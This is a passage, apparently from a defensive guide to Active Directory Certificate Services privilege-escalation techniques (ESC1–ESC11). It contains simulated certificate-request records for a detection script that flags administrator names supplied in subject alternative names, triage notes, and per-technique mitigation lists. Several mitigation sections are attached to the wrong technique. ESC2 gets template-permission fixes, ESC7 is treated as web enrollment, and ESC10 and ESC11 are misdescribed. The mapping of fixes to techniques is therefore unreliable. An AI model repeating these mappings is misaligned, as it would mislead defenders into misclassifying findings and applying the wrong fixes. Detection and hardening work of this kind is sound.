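    record("1001", "DOMAIN\\jdoe", "User", "jdoe@domain.local"),                 # normal
    record("1002", "DOMAIN\\jdoe", "VulnTemplate", "administrator@domain.local"),  # SAN in CSR
    record("1003", "DOMAIN\\WS01$", "Machine"),                                  # no UPN SAN
    record("1004", "DOMAIN\\jdoe", "User", "administrator@domain.local",
           attributes="SAN:upn=administrator@domain.local"),                     # SAN via attribute
    record("1005", "DOMAIN\\jdoe", "User", "bob@domain.local"),                  # other user
] + [
    record(str(2000 + i), "DOMAIN\\svc_scanner", "User", "svc_scanner@domain.local")
    for i in range(5)                                                            # bulk requester
]

if __name__ == "__main__":
    for alert in analyse(SAMPLE_RECORDS):
        print(alert)
```

The origin tag matters for triage: a mismatch of origin "request-attribute" can only succeed on a CA with EDITF_ATTRIBUTESUBJECTALTNAME2 set, so it points at the CA configuration, while a mismatch of origin "certificate" points at the template that accepted an enrollee-supplied subject. Event 4887 is only emitted when certificate issuance auditing is enabled on the CA, so that setting is a prerequisite for this detection.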

Mitigation

General Mitigations:

  • Apply the principle of least privilege to CA and template permissions
  • Require manager approval for sensitive certificate templates
  • Implement proper access controls on certificate enrollment
  • Use strong authentication for certificate enrollment
  • Regularly audit certificate templates and CA configurations

ESC1-specific:

  • Remove the ENROLLEE_SUPPLIES_SUBJECT flag from templates
  • Restrict enrollment rights to necessary groups only
  • Disable vulnerable templates

ESC2-specific:

  • Review and restrict ACLs on certificate templates
  • Remove unnecessary write permissions
  • Implement approval requirements for template modifications

ESC3-specific:

  • Restrict enrollment agent templates to necessary users only
  • Require manager approval for certificates issued by enrollment agents
  • Monitor the use of enrollment agent certificates

ESC4/ESC5-specific:

  • Review and restrict ACLs on the CA
  • Monitor for changes to CA configuration
  • Implement approval workflows for CA modifications

ESC6-specific:

  • Disable the EDITF_ATTRIBUTESUBJECTALTNAME2 flag on the CA
  • If the flag is required, implement additional validation

ESC7-specific:

  • Restrict access to web enrollment interfaces
  • Implement strong authentication for web enrollment
  • Use certificate enrollment policies

ESC8-specific:

  • Enable Extended Protection for Authentication (EPA)
  • Require HTTPS for certificate enrollment
  • Implement SMB signing and LDAP signing
  • Disable NTLM where possible and use Kerberos

ESC9-specific:

  • Ensure all templates include appropriate security extensions
  • Review certificate usage in the environment
  • Implement certificate issuance policies

ESC10-specific:

  • Restrict access to CA configuration information
  • Implement proper information disclosure controls
  • Use access control to limit who can query CA configurations

ESC11-specific:

  • Validate all certificate fields properly
  • Implement proper input validation for certificate requests
  • Use application policies to restrict certificate usage